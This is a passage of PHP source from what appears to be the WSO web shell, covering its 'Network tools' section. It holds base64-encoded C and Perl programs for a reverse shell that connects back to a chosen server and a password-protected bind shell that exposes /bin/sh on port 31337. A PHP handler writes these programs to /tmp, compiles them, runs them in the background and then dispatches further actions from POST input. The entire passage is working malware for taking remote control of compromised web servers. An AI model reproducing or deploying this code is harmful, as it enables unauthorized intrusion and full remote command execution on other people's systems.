1111 $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";
1112 $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
1113 $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";
1114 $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
1115 
1116?>
1117	<h1>Network tools</h1><div class=content>
1118	<form name='nfp' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);
1119return false;
1120">
1121	<span>Bind port to /bin/sh</span><br/>
1122	Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass' value='wso'> Using: <select name="using"><option value='bpc'>C</option><option value='bpp'>Perl</option></select> <input type=submit value=">>">
1123	</form>
1124	<form name='nfp' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);
1125return false;
1126">
1127	<span>Back-connect to</span><br/>
1128	Server: <input type='text' name='server' value='
1129<?php echo $_SERVER['REMOTE_ADDR']
1130?>'> Port: <input type='text' name='port' value='31337'> Using: <select name="using"><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit value=">>">
1131	</form><br>
1132	
1133<?php if(isset($_POST['p1'])) { function cf($f,$t) { $w=@fopen($f,"w") or @function_exists('file_put_contents');
1134 if($w) { @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));
1135 @fclose($w);
1136 } } if($_POST['p1'] == 'bpc') { cf("/tmp/bp.c",$bind_port_c);
1137 $out = ex("gcc -o /tmp/bp /tmp/bp.c");
1138 @unlink("/tmp/bp.c");
1139 $out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
1140 echo "<pre class=ml1>$out\n".ex("ps aux | grep bp")."</pre>";
1141 } if($_POST['p1'] == 'bpp') { cf("/tmp/bp.pl",$bind_port_p);
1142 $out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
1143 echo "<pre class=ml1>$out\n".ex("ps aux | grep bp.pl")."</pre>";
1144 } if($_POST['p1'] == 'bcc') { cf("/tmp/bc.c",$back_connect_c);
1145 $out = ex("gcc -o /tmp/bc /tmp/bc.c");
1146 @unlink("/tmp/bc.c");
1147 $out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
1148 echo "<pre class=ml1>$out\n".ex("ps aux | grep bc")."</pre>";
1149 } if($_POST['p1'] == 'bcp') { cf("/tmp/bc.pl",$back_connect_p);
1150 $out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");
1151 echo "<pre class=ml1>$out\n".ex("ps aux | grep bc.pl")."</pre>";
1152 } } echo '</div>';
1153 printFooter();
1154 } if( empty($_POST['a']) ) if(isset($default_action) && function_exists('action' . $default_action)) $_POST['a'] = $default_action;
1155 else $_POST['a'] = 'SecInfo';
1156 if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) ) call_user_func('action' . $_POST['a']);
1157 
1158?>